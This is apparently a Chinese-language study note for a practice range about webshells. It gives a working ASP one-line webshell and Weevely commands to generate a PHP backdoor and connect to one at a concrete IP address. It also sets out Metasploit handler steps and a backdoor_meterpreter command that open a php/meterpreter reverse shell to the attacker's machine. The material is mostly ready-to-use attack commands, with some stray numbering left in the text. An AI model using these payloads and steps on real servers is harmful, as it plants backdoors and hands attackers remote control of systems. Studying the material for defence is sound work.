测试靶场
木马
小马:上传文件,体积较小,文件管理(例如sqlmap的管理os-shell里面就会帮你上传小马)
大马: 文件体积较大、功能齐全、能够提权、操作数据库等
一句话木马(主流):功能强大、客户端直接管理
1
2
3 例如:
asp的一句话木马:<% execute request['a']%>
php的一句话木马:
中国菜刀
中国蚁剑
Kali Linux shell Weevely
安装:https://github.com/epinna/weevely3 (一般kali linux都自带了)
1、生成shell
- 命令: weevely generate 123 shell.php
2、连接shell
- 命令:weevely http://59.63.200.79:8804/shell.php 123
基本模块使用
1、system_info
生成meterpreter会话
MSF设置
- use exploit/multi/handler
- show payloads
- set payload php/meterpreter/reverse_tcp
- show options
- set lhost 本机IP
- run
2、生成meterpreter会话
1 backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 本机ip -port 端口